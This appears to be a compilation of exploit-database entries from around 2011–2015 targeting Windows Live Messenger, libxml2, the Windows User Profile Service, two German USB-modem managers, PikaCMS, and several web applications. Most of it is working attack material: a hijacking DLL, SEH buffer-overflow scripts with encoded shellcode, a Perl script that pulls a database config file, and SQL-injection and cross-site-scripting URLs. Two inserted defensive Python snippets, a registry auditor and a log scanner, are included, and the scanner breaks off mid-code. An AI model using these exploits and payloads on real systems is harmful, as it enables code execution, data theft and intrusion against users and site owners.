
// source: https://www.securityfocus.com/bid/48055/info

Microsoft Windows Live Messenger is prone to a vulnerability that lets attackers execute arbitrary code.

An attacker can exploit this issue by enticing a legitimate user to use the vulnerable application to open a file from a network share location that contains a specially crafted Dynamic Linked Library (DLL) file. 

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0     _                   __           __       __                     1
1   /' \            __  /'__`\        /\ \__  /'__`\                   0
0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
1                  \ \____/ >> Exploit database separated by exploit   0
0                   \/___/          type (local, remote, DoS, etc.)    1
1                                                                      1
0  [+] Site            : 1337day.com                                  0
1  [+] Support e-mail  : submit[at]1337day.com                        1
0                                                                      0
1               #########################################              1
0               I'm kalashinkov3 member from Inj3ct0r Team              1
1               #########################################              0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1

#########################################################
# Title : Msn Live Messenger14.0=>Plus! DLL Hijacking Exploit (dwmapi.dll)
# Author: Kalashinkov3
# Home : 13000/ ALGERIA
# Email : kalashinkov3[at]Hotmail[dot]Fr
# Date : 31/05/2011
# Category  : Local Exploit
# Tested on: [Windows Xp Sp3 Fr]       
#########################################################  

# Vulnerable file:
- msnmsgr.exe

# Vulnerable extensions:
- .plsk

# Vulnerable DLLs:
- dwmapi.dll

#include <windows.h>
#include <stdlib.h>
#define DLLIMPORT __declspec(dllexport)

/* Forward declaration: the exports below call evil() before it is defined. */
int evil(void);

/* Each export carries the name of a real dwmapi.dll entry point so the
   loader resolves msnmsgr.exe's imports against this file; every one of
   them simply runs the proof-of-concept payload. */
DLLIMPORT void DwmDefWindowProc() { evil(); }
DLLIMPORT void DwmEnableBlurBehindWindow() { evil(); }
DLLIMPORT void DwmEnableComposition() { evil(); }
DLLIMPORT void DwmEnableMMCSS() { evil(); }
DLLIMPORT void DwmExtendFrameIntoClientArea() { evil(); }
DLLIMPORT void DwmGetColorizationColor() { evil(); }
DLLIMPORT void DwmGetCompositionTimingInfo() { evil(); }
DLLIMPORT void DwmGetWindowAttribute() { evil(); }
DLLIMPORT void DwmIsCompositionEnabled() { evil(); }
DLLIMPORT void DwmModifyPreviousDxFrameDuration() { evil(); }
DLLIMPORT void DwmQueryThumbnailSourceSize() { evil(); }
DLLIMPORT void DwmRegisterThumbnail() { evil(); }
DLLIMPORT void DwmSetDxFrameDuration() { evil(); }
DLLIMPORT void DwmSetPresentParameters() { evil(); }
DLLIMPORT void DwmSetWindowAttribute() { evil(); }
DLLIMPORT void DwmUnregisterThumbnail() { evil(); }
DLLIMPORT void DwmUpdateThumbnailProperties() { evil(); }

/* Proof-of-concept payload: start calc.exe, then terminate the host process. */
int evil(void)
{
  WinExec("calc", 0);
  exit(0);
  return 0;
}


^_^ GOOD LUCK ALL :) 

+ Greets To==================================================================+
                                                                             + 
BrOx-dz, KedAns-Dz, Caddy-Dz, KnocKout, toxic-kim, [Lila Far=>D], Keinji1258 +
ALLA Foundou,586, 1337day.com, packetstormsecurity.org, Exploit-id.com       +
andhrahackers.com, all Algerians Hacker'S ;) & 1337day.com/team              +
                    # All My Friends #                                       +
=============================================================================+
            
source: https://www.securityfocus.com/bid/48056/info

The 'libxml2' library is prone to multiple memory-corruption vulnerabilities, including one that can trigger a heap-based buffer-overflow error and an integer-overflow condition.

An attacker can exploit these issues by enticing an unsuspecting user into opening a specially crafted XML file that contains a malicious XPath.

A successful attack can allow attacker-supplied code to run in the context of the application using the vulnerable library or can cause a denial-of-service condition.

XPath expression that triggers the issue:

//@*/preceding::node()/ancestor::node()/ancestor::foo['foo']
            
## Source: https://code.google.com/p/google-security-research/issues/detail?id=123

Platform: Windows 8.1 Update 32/64 bit (No other OS tested)

When a user logs into a computer the User Profile Service is used to create certain directories and mount the user hives (as a normal user account cannot do so). In theory the only thing which needs to be done under a privileged account (other than loading the hives) is creating the base profile directory. This should be secure because c:\users requires administrator privileges to create. The configuration of the profile location is in HKLM so that can’t be influenced. 

However, there seems to be a bug in the way it handles impersonation: the first few resources in the profile get created under the user’s token, but this changes to impersonating Local System part of the way through. Any resources created while impersonating Local System might be exploitable to elevate privilege. Note that this occurs every time the user logs in to their account; it isn't something that only happens during the initial provisioning of the local profile.

Some identified issues are:

* When creating directories the service does a recursive create, so for example if creating c:\users\user it will first create c:\users then c:\users\user. Probably not exploitable because Users already exists, but of course worth remembering that normal users can create directories in the c: drive root, so there is always a possibility of being able to place a junction point at c:\users on some systems.

* The service creates the temporary folder for the user in CreateTempDirectoryForUser and gets the value from the user’s hive Environment key (TEMP and TMP). This folder is created under system privileges. All it requires is the string starts with %USERPROFILE% so you can do relative paths or just replace USERPROFILE in the environment. This probably isn't that useful on the whole as the security of the directory is inherited from the parent.

* Creation of AppData\LocalLow folder in EnsurePreCreateKnownFolders. This might be exploited to set an arbitrary directory’s integrity level to Low as it tries to set the label explicitly. But that’s probably only of interest if there’s a directory which a normal user would be able to write to but is blocked by a high/system integrity level which is unlikely. 

* Probably most serious is the handling of the %USERPROFILE%\AppData\Local\Microsoft\Windows\UsrClass.dat registry hive. The profile service queries for the location of AppData\Local from the user’s registry hive, then tries to create the Windows folder and UsrClass.dat file. By creating a new folder structure, changing the user's shell folders registry key and placing a junction in the hierarchy you can get this process to open any other UsrClass.dat file on the system, assuming it isn't already loaded.

For example you could create a directory hierarchy like:
%USERPROFILE%\AppData\NotLocal\Microsoft\Windows -> c:\users\administrator\appdata\local\Microsoft\windows

Then set HKCU\Software\Microsoft\Windows\Explorer\User Shell Folders\Local AppData to %USERPROFILE%\AppData\NotLocal.

It even seems to set the root key security when it does so, which might be useful for privilege escalation. This has a chicken-and-egg problem in that the NtLoadKey system call will create the file if it doesn't exist (it sets the FILE_OPEN_IF disposition flag), but you must be running as an administrator, otherwise the privilege check for SeRestorePrivilege will fail.

I've looked at the implementation on Windows 7 and there are a few similar issues, but the Windows 8.1 implementation of the service does a lot more. At least the most serious UsrClass.dat issue exists in 7.

Attached is a batch file PoC for Windows 8.1 Update which demonstrates the temporary folder issue. To verify, perform the following steps:
1) Execute the batch file as a normal user (this was tested with a local account, not a Microsoft online linked account, or domain). This will change the environment variables TEMP and TMP to be %USERPROFILE%\..\..\..\..\Windows\faketemp
2) Logout then log back in again
3) Observe that the directory \Windows\faketemp has been created.

The batch file sets both values with reg add:

reg add HKCU\Environment /v TEMP /f /t REG_EXPAND_SZ /d %%USERPROFILE%%\..\..\..\..\..\windows\faketemp
reg add HKCU\Environment /v TMP /f /t REG_EXPAND_SZ /d %%USERPROFILE%%\..\..\..\..\..\windows\faketemp
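As an added check that is not part of the original report, the following Python applies the two conditions the report describes to registry values supplied as input: a TEMP/TMP value that starts with %USERPROFILE% but resolves outside the profile once its '..' components are collapsed, and a Local AppData shell-folder value redirected away from AppData\Local. The sample values, the profile path C:\Users\alice and the function names are constructed for the example; it does not read the registry.

```python
import ntpath

# Constructed sample values (not read from a real registry): TEMP is what the
# batch PoC above writes, TMP is the normal default, and Local AppData is the
# redirected shell folder from the UsrClass.dat example.
USERPROFILE = r"C:\Users\alice"
SAMPLE_VALUES = {
    "TEMP": r"%USERPROFILE%\..\..\..\..\..\windows\faketemp",
    "TMP": r"%USERPROFILE%\AppData\Local\Temp",
    "Local AppData": r"%USERPROFILE%\AppData\NotLocal",
}


def expand(value, env):
    """Expand %NAME% references the way a REG_EXPAND_SZ value is expanded."""
    out = value
    for name, val in env.items():
        out = out.replace("%" + name + "%", val)
    return out


def resolves_under(value, root, env):
    """True if the expanded value, with its '..' components collapsed, is the
    root directory or lies beneath it. Comparison is case-insensitive."""
    full = ntpath.normcase(ntpath.normpath(expand(value, env)))
    base = ntpath.normcase(ntpath.normpath(root))
    return full == base or full.startswith(base + "\\")


def audit_profile_values(values, userprofile):
    """Return (value name, resolved path, reason) for each suspicious value.

    TEMP/TMP are only created with system privileges when they start with
    %USERPROFILE%, so values that do not start with it are out of scope here.
    """
    env = {"USERPROFILE": userprofile}
    findings = []
    for name in ("TEMP", "TMP"):
        raw = values.get(name, "")
        if not raw.upper().startswith("%USERPROFILE%"):
            continue
        if not resolves_under(raw, userprofile, env):
            findings.append((name, ntpath.normpath(expand(raw, env)),
                             "escapes the profile directory via '..'"))
    local = values.get("Local AppData", r"%USERPROFILE%\AppData\Local")
    resolved = ntpath.normpath(expand(local, env))
    expected = ntpath.normcase(ntpath.join(userprofile, "AppData", "Local"))
    if ntpath.normcase(resolved) != expected:
        findings.append(("Local AppData", resolved,
                         "shell folder redirected away from AppData\\Local"))
    return findings


if __name__ == "__main__":
    for name, path, reason in audit_profile_values(SAMPLE_VALUES, USERPROFILE):
        print(f"[!] {name}: {path} ({reason})")
```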
            
#!/usr/bin/python
# coding: utf-8
#Exploit Title:T-Mobile Internet Manager SEH Buffer Overflow 
#Version:Internet Manager Software für Windows (TMO_PCV1.0.5B06)
#Software for usb Wireless:T-Mobile web'n'walk Stick Fusion
#Homepage:https://www.t-mobile.de/meinhandy/1,25412,19349-_,00.html
#Software Link:https://www.t-mobile.de/downloads/neu/winui.zip
#Found:8.01.2015
#Exploit Author: metacom - twitter.com/m3tac0m
#Tested on: Win-7 En, Win-8.1 DE-Enterprise, Win-XPSp3 EN
#Video poc:http://bit.ly/17DhwSR
print "[*]Copy UpdateCfg.ini to C:\Program Files\T-Mobile\InternetManager_Z\Bin\n"
print "[*]Open Program and go to Menu-Options \n"
print "[*]Click Update and press Now look for Update\n"
from struct import pack
junk="\x41" * 18073
nseh="\xeb\x06\x90\x90" 
seh=pack('<I',0x6900CEAE)#6900CEAE 5F  POP EDI intl.dll
nops="\x90" * 100
#msfpayload windows/exec EXITFUNC=seh CMD=calc.exe R | 
#msfencode -e x86/alpha_upper -b "\x00\x0a\x0d\x1a\xff" -t c
shellcode=("\x89\xe2\xdd\xc1\xd9\x72\xf4\x5e\x56\x59\x49\x49\x49\x49\x43"
"\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56\x58\x34"
"\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41\x41"
"\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58"
"\x50\x38\x41\x43\x4a\x4a\x49\x4b\x4c\x5a\x48\x4d\x59\x55\x50"
"\x35\x50\x35\x50\x53\x50\x4d\x59\x4b\x55\x46\x51\x59\x42\x33"
"\x54\x4c\x4b\x56\x32\x30\x30\x4c\x4b\x31\x42\x44\x4c\x4c\x4b"
"\x30\x52\x45\x44\x4c\x4b\x44\x32\x57\x58\x34\x4f\x38\x37\x50"
"\x4a\x51\x36\x46\x51\x4b\x4f\x30\x31\x49\x50\x4e\x4c\x47\x4c"
"\x33\x51\x43\x4c\x34\x42\x36\x4c\x31\x30\x49\x51\x48\x4f\x54"
"\x4d\x45\x51\x59\x57\x4d\x32\x4c\x30\x56\x32\x46\x37\x4c\x4b"
"\x31\x42\x44\x50\x4c\x4b\x31\x52\x57\x4c\x43\x31\x48\x50\x4c"
"\x4b\x51\x50\x53\x48\x4b\x35\x49\x50\x34\x34\x51\x5a\x53\x31"
"\x4e\x30\x36\x30\x4c\x4b\x50\x48\x52\x38\x4c\x4b\x36\x38\x47"
"\x50\x45\x51\x58\x53\x4b\x53\x57\x4c\x37\x39\x4c\x4b\x36\x54"
"\x4c\x4b\x33\x31\x39\x46\x30\x31\x4b\x4f\x56\x51\x49\x50\x4e"
"\x4c\x4f\x31\x58\x4f\x44\x4d\x55\x51\x49\x57\x37\x48\x4d\x30"
"\x52\x55\x4b\x44\x43\x33\x43\x4d\x4a\x58\x37\x4b\x33\x4d\x57"
"\x54\x33\x45\x4b\x52\x30\x58\x4c\x4b\x36\x38\x57\x54\x33\x31"
"\x58\x53\x55\x36\x4c\x4b\x54\x4c\x30\x4b\x4c\x4b\x56\x38\x45"
"\x4c\x35\x51\x58\x53\x4c\x4b\x55\x54\x4c\x4b\x33\x31\x38\x50"
"\x4b\x39\x57\x34\x31\x34\x46\x44\x51\x4b\x31\x4b\x53\x51\x30"
"\x59\x50\x5a\x46\x31\x4b\x4f\x4d\x30\x51\x48\x31\x4f\x30\x5a"
"\x4c\x4b\x34\x52\x5a\x4b\x4c\x46\x31\x4d\x33\x5a\x43\x31\x4c"
"\x4d\x4c\x45\x38\x39\x55\x50\x45\x50\x43\x30\x50\x50\x53\x58"
"\x56\x51\x4c\x4b\x32\x4f\x4c\x47\x4b\x4f\x38\x55\x4f\x4b\x4b"
"\x4e\x44\x4e\x30\x32\x4a\x4a\x32\x48\x39\x36\x4c\x55\x4f\x4d"
"\x4d\x4d\x4b\x4f\x4e\x35\x47\x4c\x33\x36\x43\x4c\x35\x5a\x4d"
"\x50\x4b\x4b\x4b\x50\x54\x35\x33\x35\x4f\x4b\x47\x37\x52\x33"
"\x54\x32\x32\x4f\x42\x4a\x43\x30\x46\x33\x4b\x4f\x49\x45\x52"
"\x43\x53\x51\x42\x4c\x53\x53\x46\x4e\x43\x55\x43\x48\x35\x35"
"\x43\x30\x41\x41")
header  = "\x5b\x55\x50\x44\x41\x54\x45\x5d\x0a\x0a\x0a\x0a\x45\x4e\x41\x42\x4c\x45\x5f\x55\x50\x44\x41\x54\x45\x3d\x31\x0a\x0a\x0a"
header += "\x0a\x55\x50\x44\x41\x54\x45\x5f\x46\x52\x45\x51\x55\x45\x4e\x43\x45\x3d\x31\x34\x0a\x0a\x0a\x0a\x5b\x53\x65\x72\x76\x69"
header += "\x63\x65\x5d\x0a\x0a\x0a\x0a\x6d\x65\x74\x61\x63\x6f\x6d\x3d\x74\x77\x69\x74\x74\x65\x72\x2e\x63\x6f\x6d\x2f\x6d\x33\x74"
header += "\x61\x63\x30\x6d\x0a\x0a\x0a\x0a\x53\x65\x72\x76\x69\x63\x65\x55\x52\x4c\x3d\x68\x74\x74\x70\x73\x3a\x2f\x2f\x74\x6d\x6f"
header += "\x62\x69\x6c\x65\x2e\x7a\x74\x65\x2e\x63\x6f\x6d\x2e\x63\x6e\x2f\x55\x70\x64\x61\x74\x65\x45\x6e\x74\x72\x79\x2e\x61\x73"
header += "\x70\x78\x0a\x0a\x0a\x0a\x55\x70\x64\x61\x74\x65\x52\x65\x70\x6f\x72\x74\x3d\x68\x74\x74\x70\x73\x3a\x2f\x2f\x74\x6d\x6f"
header += "\x62\x69\x6c\x65\x2e\x7a\x74\x65\x2e\x63\x6f\x6d\x2e\x63\x6e\x2f\x55\x70\x64\x61\x74\x65\x52\x65\x73\x75\x6c\x74\x52\x65"
header += "\x70\x6f\x72\x74\x2e\x61\x73\x70\x78"+junk+nseh+seh+nops+shellcode+'\n\n'
footer  = "\x0a\x53\x65\x72\x76\x69\x63\x65\x50\x6f\x72\x74\x3d\x34\x34\x33\x0a\x0a\x0a\x0a\x55\x50\x44\x41\x54\x45\x5f\x50\x41\x54\x48"
footer += "\x3d\x2e\x2f\x64\x6f\x77\x6e\x6c\x6f\x61\x64\x0a\x0a\x0a\x0a\x52\x45\x54\x52\x59\x5f\x43\x4f\x4e\x4e\x45\x43\x54\x3d\x33"
footer += "\x30\x30\x0a\x0a\x0a\x0a\x52\x45\x54\x52\x59\x5f\x53\x4c\x45\x45\x50\x3d\x31\x0a\x0a\x0a\x0a\x43\x4f\x4e\x4e\x45\x43\x54"
footer += "\x5f\x54\x49\x4d\x45\x4f\x55\x54\x3d\x32\x30\x0a\x0a\x0a\x0a\x5b\x55\x70\x64\x61\x74\x65\x4d\x6f\x64\x65\x5d\x0a\x0a\x0a"
footer += "\x0a\x4d\x6f\x64\x65\x53\x65\x6c\x65\x63\x74\x53\x79\x73\x3d\x31\x0a" 
exploit =  header + footer
filename = "UpdateCfg.ini"
file = open(filename , "w")
file.write(exploit)
file.close()
            
#!/usr/bin/python
#Exploit Title:Congstar Internet-Manager SEH Buffer Overflow 
#Software for usb Wireless:Congstar Prepaid Internet-Stick (MF100)
#Homepage:www.congstar.de/downloads/prepaid-internet-stick/
#Software Link:www.congstar.de/fileadmin/files_congstar/software/20100726_Congstar_Install%20Pakcage_WIN.zip
#Version:14.0.0.162
#Found:8.01.2015
#Exploit Author: metacom - twitter.com/m3tac0m
#Tested on: Windows 7 En
print "[*]Copy UpdateCfg.ini to C:\Program Files\congstar\Internetmanager\Bin\n"
print "[*]Open Program and go to Menu-Options \n"
print "[*]Click Update and press Now look for Update\n"
print "[*]DE --> Menu-->Einstellungen-->Aktualisierung-->Jetzt nach Aktualisierung suchen\n"
from struct import pack
buffer1 = "\x5b\x55\x50\x44\x41\x54\x45\x5d\x0a\x0a\x45\x4e\x41\x42\x4c\x45\x5f\x55\x50\x44\x41\x54\x45\x3d\x31\x0a\x0a\x55\x50\x44"
buffer1 += "\x41\x54\x45\x5f\x46\x52\x45\x51\x55\x45\x4e\x43\x45\x3d\x31\x34\x0a\x0a\x5b\x53\x65\x72\x76\x69\x63\x65\x5d\x0a\x0a\x53"
buffer1 += "\x65\x72\x76\x69\x63\x65\x55\x52\x4c\x3d\x68\x74\x74\x70\x73\x3a\x2f\x2f\x74\x6d\x6f\x62\x69\x6c\x65\x2e\x7a\x74\x65\x2e"
buffer1 += "\x63\x6f\x6d\x2e\x63\x6e\x2f\x55\x70\x64\x61\x74\x65\x45\x6e\x74\x72\x79\x2e\x61\x73\x70\x78\x0a"
junk="\x41" * 18164
nseh="\xeb\x06\x90\x90" 
seh=pack('<I',0x7C3A1868)#7C3A1868
nops="\x90" * 100
#msfpayload windows/exec EXITFUNC=seh CMD=calc.exe R | 
#msfencode -e x86/alpha_upper -b "\x00\x0a\x0d\x1a\xff" -t c
shellcode=("\x89\xe2\xdd\xc1\xd9\x72\xf4\x5e\x56\x59\x49\x49\x49\x49\x43"
"\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56\x58\x34"
"\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41\x41"
"\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58"
"\x50\x38\x41\x43\x4a\x4a\x49\x4b\x4c\x5a\x48\x4d\x59\x55\x50"
"\x35\x50\x35\x50\x53\x50\x4d\x59\x4b\x55\x46\x51\x59\x42\x33"
"\x54\x4c\x4b\x56\x32\x30\x30\x4c\x4b\x31\x42\x44\x4c\x4c\x4b"
"\x30\x52\x45\x44\x4c\x4b\x44\x32\x57\x58\x34\x4f\x38\x37\x50"
"\x4a\x51\x36\x46\x51\x4b\x4f\x30\x31\x49\x50\x4e\x4c\x47\x4c"
"\x33\x51\x43\x4c\x34\x42\x36\x4c\x31\x30\x49\x51\x48\x4f\x54"
"\x4d\x45\x51\x59\x57\x4d\x32\x4c\x30\x56\x32\x46\x37\x4c\x4b"
"\x31\x42\x44\x50\x4c\x4b\x31\x52\x57\x4c\x43\x31\x48\x50\x4c"
"\x4b\x51\x50\x53\x48\x4b\x35\x49\x50\x34\x34\x51\x5a\x53\x31"
"\x4e\x30\x36\x30\x4c\x4b\x50\x48\x52\x38\x4c\x4b\x36\x38\x47"
"\x50\x45\x51\x58\x53\x4b\x53\x57\x4c\x37\x39\x4c\x4b\x36\x54"
"\x4c\x4b\x33\x31\x39\x46\x30\x31\x4b\x4f\x56\x51\x49\x50\x4e"
"\x4c\x4f\x31\x58\x4f\x44\x4d\x55\x51\x49\x57\x37\x48\x4d\x30"
"\x52\x55\x4b\x44\x43\x33\x43\x4d\x4a\x58\x37\x4b\x33\x4d\x57"
"\x54\x33\x45\x4b\x52\x30\x58\x4c\x4b\x36\x38\x57\x54\x33\x31"
"\x58\x53\x55\x36\x4c\x4b\x54\x4c\x30\x4b\x4c\x4b\x56\x38\x45"
"\x4c\x35\x51\x58\x53\x4c\x4b\x55\x54\x4c\x4b\x33\x31\x38\x50"
"\x4b\x39\x57\x34\x31\x34\x46\x44\x51\x4b\x31\x4b\x53\x51\x30"
"\x59\x50\x5a\x46\x31\x4b\x4f\x4d\x30\x51\x48\x31\x4f\x30\x5a"
"\x4c\x4b\x34\x52\x5a\x4b\x4c\x46\x31\x4d\x33\x5a\x43\x31\x4c"
"\x4d\x4c\x45\x38\x39\x55\x50\x45\x50\x43\x30\x50\x50\x53\x58"
"\x56\x51\x4c\x4b\x32\x4f\x4c\x47\x4b\x4f\x38\x55\x4f\x4b\x4b"
"\x4e\x44\x4e\x30\x32\x4a\x4a\x32\x48\x39\x36\x4c\x55\x4f\x4d"
"\x4d\x4d\x4b\x4f\x4e\x35\x47\x4c\x33\x36\x43\x4c\x35\x5a\x4d"
"\x50\x4b\x4b\x4b\x50\x54\x35\x33\x35\x4f\x4b\x47\x37\x52\x33"
"\x54\x32\x32\x4f\x42\x4a\x43\x30\x46\x33\x4b\x4f\x49\x45\x52"
"\x43\x53\x51\x42\x4c\x53\x53\x46\x4e\x43\x55\x43\x48\x35\x35"
"\x43\x30\x41\x41")
poc="\n" + "UpdateReport" + "=" + junk + nseh + seh + nops + shellcode +"\n\n"
buffer2 = "\x53\x65\x72\x76\x69\x63\x65\x50\x6f\x72\x74\x3d\x34\x34\x33\x0a\x0a\x55\x50\x44\x41\x54\x45\x5f\x50\x41\x54\x48\x3d\x2e"
buffer2 += "\x2f\x64\x6f\x77\x6e\x6c\x6f\x61\x64\x0a\x0a\x52\x45\x54\x52\x59\x5f\x43\x4f\x4e\x4e\x45\x43\x54\x3d\x33\x30\x30\x0a\x0a"
buffer2 += "\x52\x45\x54\x52\x59\x5f\x53\x4c\x45\x45\x50\x3d\x31\x0a\x0a\x43\x4f\x4e\x4e\x45\x43\x54\x5f\x54\x49\x4d\x45\x4f\x55\x54"
buffer2 += "\x3d\x32\x30\x0a\x0a\x5b\x55\x70\x64\x61\x74\x65\x4d\x6f\x64\x65\x5d\x0a\x0a\x4d\x6f\x64\x65\x53\x65\x6c\x65\x63\x74\x53"
buffer2 += "\x79\x73\x3d\x31\x0a"
exploit =  buffer1 + poc + buffer2
try:
    out_file = open("UpdateCfg.ini",'w')
    out_file.write(exploit)
    out_file.close()
except:
    print "Error"
            
source: https://www.securityfocus.com/bid/48067/info

TEDE Simplificado is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in an SQL query.

A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.

TEDE Simplificado v1.01 and vS2.04 are vulnerable; other versions may also be affected. 

http://www.example.com/tde_busca/processaPesquisa.php?pesqExecutada=1&id=663%20and%28select%201%20from%28select%20count%28*%29,concat%28%28select%20%28select%20concat%280x7e,0x27,unhex%28hex%28database%28%29%29%29,0x27,0x7e%29%29%20from%20information_schema.tables%20limit%200,1%29,floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29%20and%201=1

http://www.example.com/tde_busca/tde_fut.php?id=10%20union%20select%201,2,3,4 
            
source: https://www.securityfocus.com/bid/48068/info

PikaCMS is prone to multiple local file-disclosure vulnerabilities because it fails to adequately validate user-supplied input.

Exploiting these vulnerabilities may allow an attacker to obtain potentially sensitive information from local files on computers running the vulnerable application. This may aid in further attacks. 

use LWP::Simple;
use LWP::UserAgent;
system('cls');
system("title Pika CMS <= Remote 'baza_mysql.php' Disclosure  Exploit");
system('color 2');
if(@ARGV < 2)
{
print "[-]Su Sekilde Kocum. \n\n";
&help; exit();
}
sub help()
{
print "[+] usage1 : perl $0 HedefWeb /path/ \n";
print "[+] usage2 : perl $0 localhost / \n";
}
print "\n************************************************************************\n";
print "\* Pika CMS <= Remote 'baza_mysql.php' Disclosure  Exploit              *\n";
print "\* Exploited By : KnocKout                                                  *\n";
print "\* Contact :   knockoutr[at]msn[dot]com                                 *\n";
print "\* --                                    *\n";
print "\*********************************************************************\n\n\n";
($TargetIP, $path, $File,) = @ARGV;
$File="shkarko.php?f=lidhjet/baza_mysql.php";
my $url = "http://" . $TargetIP . $path . $File;
print "\n Az Bekle Sikertiyorum!!! \n\n";
my $useragent = LWP::UserAgent->new();
my $request = $useragent->get($url,":content_file" => "baza_mysql.php");
if ($request->is_success)
{
print "[+] $url <= Hedef Site Exploit Edildi!\n\n";
print "[+] OPERASYON TAMAM !\n";
print "[+] baza_mysql.php Dosyasi Indirildi (z_WALKING_TIMES_DATA.php)\n";
print "[+] GRAYHATZ STAR \n";
print "[+] Special tnX # + Greets To Inj3ct0r Operators Team : r0073r * Sid3^effectS * r4dc0re (www.1337day.com) 
# Inj3ct0r Members 31337 : Indoushka * KnocKout * eXeSoul * eidelweiss * SeeMe * XroGuE * agix * KedAns-Dz
# gunslinger_ * Sn!pEr.S!Te * ZoRLu * anT!-Tr0J4n 'www.1337day.com/team' ++ .... 
 \n";
exit();
}
else
{
print "[!] Exploit $url Basarisiz !\n[!] ".$request->status_line."\n";
exit();
}
            
source: https://www.securityfocus.com/bid/48083/info

ARSC Really Simple Chat is prone to a cross-site scripting vulnerability and multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data.

Exploiting these issues could allow an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

ARSC Really Simple Chat 3.3-rc2 is vulnerable; other versions may also be affected. 

SQL injection:

http://www.example.com/base/admin/edit_user.php?arsc_user=-1%27%20union%20select%201,version%28%29,3,4,5,6,7,8,9,10,11,12,13,14,15%20--%202
http://www.example.com/base/admin/edit_layout.php?arsc_layout_id=-1%20union%20select%201,version%28%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20
http://www.example.com/base/admin/edit_room.php?arsc_room=%27%20union%20select%201,2,version%28%29,4,5,6,7%20--%202

Cross-site Scripting:

http://www.example.com/base/dereferer.php?arsc_link=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
            
source: https://www.securityfocus.com/bid/48085/info

NetGear WNDAP350 wireless access point is prone to multiple remote information-disclosure issues because it fails to restrict access to sensitive information.

A remote attacker can exploit these issues to obtain sensitive information that can aid in launching further attacks.

WNDAP350 with firmware 2.0.1 and 2.0.9 are vulnerable; other firmware versions may also be affected. 

http://www.example.com/downloadFile.php
http://www.example.com/BackupConfig.php 
            
source: https://www.securityfocus.com/bid/48087/info

Nagios is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.

Nagios 3.2.3 is vulnerable; other versions may also be affected. 

http://www.example.com/nagios/cgi-bin/config.cgi?type=command&expand=<script>alert(String.fromCharCode(88,83,83))</script>
http://www.example.com/nagios/cgi-bin/config.cgi?type=command&expand=<body onload=alert(666)>
            
source: https://www.securityfocus.com/bid/48100/info

Ushahidi is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query.

A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.

Ushahidi 2.0.1 is vulnerable; prior versions may also be affected. 

http://www.example.com/index.php/admin/dashboard/?range=1[SQLi] 
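Added example, not taken from any of the advisories above: a small access-log scanner that URL-decodes each request target and flags the SQL-injection and cross-site-scripting patterns used in the TEDE Simplificado, ARSC Really Simple Chat and Nagios requests shown above. The log lines are constructed from those published URLs; the rule names and functions are the example's own.

```python
import re
from urllib.parse import unquote_plus

# Constructed Common Log Format lines built from the request URLs in the
# advisories above (host www.example.com, client 203.0.113.5). Lines 2 and 6
# are benign requests to the same scripts and must not be flagged.
SAMPLE_LOG = """
203.0.113.5 - - [01/Jun/2011:10:00:01 +0000] "GET /tde_busca/processaPesquisa.php?pesqExecutada=1&id=663%20and%28select%201%20from%28select%20count%28*%29,concat%28%28select%20%28select%20concat%280x7e,0x27,unhex%28hex%28database%28%29%29%29,0x27,0x7e%29%29%20from%20information_schema.tables%20limit%200,1%29,floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29%20and%201=1 HTTP/1.1" 200 512
203.0.113.5 - - [01/Jun/2011:10:00:02 +0000] "GET /tde_busca/tde_fut.php?id=10 HTTP/1.1" 200 2048
203.0.113.5 - - [01/Jun/2011:10:00:03 +0000] "GET /base/admin/edit_user.php?arsc_user=-1%27%20union%20select%201,version%28%29,3,4,5,6,7,8,9,10,11,12,13,14,15%20--%202 HTTP/1.1" 200 771
203.0.113.5 - - [01/Jun/2011:10:00:04 +0000] "GET /base/dereferer.php?arsc_link=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E HTTP/1.1" 302 0
203.0.113.5 - - [01/Jun/2011:10:00:05 +0000] "GET /nagios/cgi-bin/config.cgi?type=command&expand=<body onload=alert(666)> HTTP/1.1" 200 913
203.0.113.5 - - [01/Jun/2011:10:00:06 +0000] "GET /nagios/cgi-bin/config.cgi?type=command HTTP/1.1" 200 913
"""

# The request target is matched non-greedily up to the protocol token because
# an unencoded payload (the Nagios line) contains spaces, which breaks the
# usual \S+ assumption about the path.
CLF = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>.*?) (?P<proto>HTTP/[\d.]+)" '
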